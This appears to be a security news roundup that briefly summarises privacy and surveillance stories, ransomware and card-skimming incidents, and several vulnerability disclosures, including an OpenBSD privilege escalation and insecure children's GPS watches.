Table of Contents

  1. Privacy
    1. Why Ring Doorbells Perfectly Exemplify the IoT Security Crisis
    2. Google Hands Feds 1,500 Phone Locations In Unprecedented ‘Geofence’ Search
  2. Surveillance
    1. Bruce Schneier - Scaring People into Supporting Backdoors
  3. Crime
    1. nginx office under police raid
    2. Another Ransomware Will Now Publish Victims' Data If Not Paid
    3. Microsoft Warns of GALLIUM Threat Group Attacking Global Telcos
    4. Maze Ransomware Demands $6 Million Ransom From Southwire
    5. Iran Banks Burned, Then Customer Accounts Were Exposed Online
    6. Hundreds of Counterfeit Sneaker Sites Hacked to Steal Credit Cards
    7. VISA Warns of Ongoing Cyber Attacks on Gas Pump PoS Systems
  4. Vulnerabilities
    1. Local Privilege Escalation in OpenBSD's dynamic loader
    2. IoT Vuln Disclosure: Children's GPS Smart Watches (R7-2019-57)
    3. Lots of bugs in 32-bit x86 Linux entry code

Privacy

Why Ring Doorbells Perfectly Exemplify the IoT Security Crisis

There has been a lot of creepy and concerning news about how Amazon's Ring smart doorbells are bringing surveillance to suburbia and sparking data-sharing relationships between Amazon and law enforcement. A podcast where thieves could broadcast audio from people's Ring feeds was shut down after it reached mainstream news.

Google Hands Feds 1,500 Phone Locations In Unprecedented ‘Geofence’ Search

The requests, outlined in two search warrants obtained by Forbes, demanded to know which specific Google customers were located in areas covering 29,387 square meters (or 3 hectares) during a total of nine hours for the four separate incidents. Unbeknownst to many Google users, if they have “location history” turned on, their whereabouts are stored by the tech giant in a database called SensorVault.

Surveillance

Bruce Schneier - Scaring People into Supporting Backdoors

Beware of the Four Horsemen of the Information Apocalypse: terrorists, drug dealers, kidnappers, and child pornographers. Seems like you can scare the public into allowing the government to do anything with those four. Strong encryption is necessary for personal and national security, weakening encryption does more harm than good, and law enforcement has other avenues for criminal investigation than eavesdropping on communications and stored devices.

Crime

NGINX office under police raid

Rambler claims that NGINX stole the web server from them, leading to a police raid in the NGINX office.

Another Ransomware Will Now Publish Victims' Data If Not Paid

The operators of the REvil Ransomware, otherwise known as Sodinokibi, have announced that they will use stolen files and data as leverage to get victims to pay ransoms. The ransom text is in Russian.

Microsoft Warns of GALLIUM Threat Group Attacking Global Telcos

GALLIUM is one of many ActivityGroups we see targeting telcos through SE Asia + Europe + Africa. The attack group seems to originate from China.

Maze Ransomware Demands $6 Million Ransom From Southwire

Attack group behind Maze Ransomware has claimed responsibility for another attack on the wire and cable manufacturer Southwire Company, demanding a $6 million ransom to decrypt the data. This is the same group that attacked the city of Pensacola few days ago, and the security staffing firm Allied Universal.

Iran Banks Burned, Then Customer Accounts Were Exposed Online

15 million bank debit cards in Iran had been published on social media in the aftermath of the protests, which is about a fifth of the country's population.

Hundreds of Counterfeit Sneaker Sites Hacked to Steal Credit Cards

Malwarebytes has discovered a large scale attack targeting counterfeit sneaker sites, by injecting Magecart scripts that steal credit card information. The Attack seems to originate from China.

VISA Warns of Ongoing Cyber Attacks on Gas Pump POS Systems

The attack appears to come from a financially motivated group. The attackers used an unknown vector to gain network access and infect the POS environment with a RAM scraper malicious payload that specifically targeted magnetic stripe transactions.

Vulnerabilities

Local Privilege Escalation in OpenBSD's dynamic loader

By using a bug in the dynamic loader in OpenBSD it's possible for a low privileged user to gain root access. A patch with the fix has already been released.

IoT Vuln Disclosure: Children's GPS Smart Watches (R7-2019-57)

Rapid7 has tested three different brands of smart watches for children. They all were extremely insecure, and the vendors don't have any contact information available online. They are all produced in China and have basically the same hardware in a different case. The SMS filtering option has no effect, so anyone can interact with the device via SMS. In addition, the watches have a default configuration password of 123456 which cannot be changed.

Lots of bugs in 32-bit x86 Linux entry code

x8632 Linux is not properly maintained anymore, and lots of serious security bugs have been discovered and fixed. Kernel developers are asking users to migrate to a x8664 kernel or finding and paying someone to maintain the 32-bit branch properly.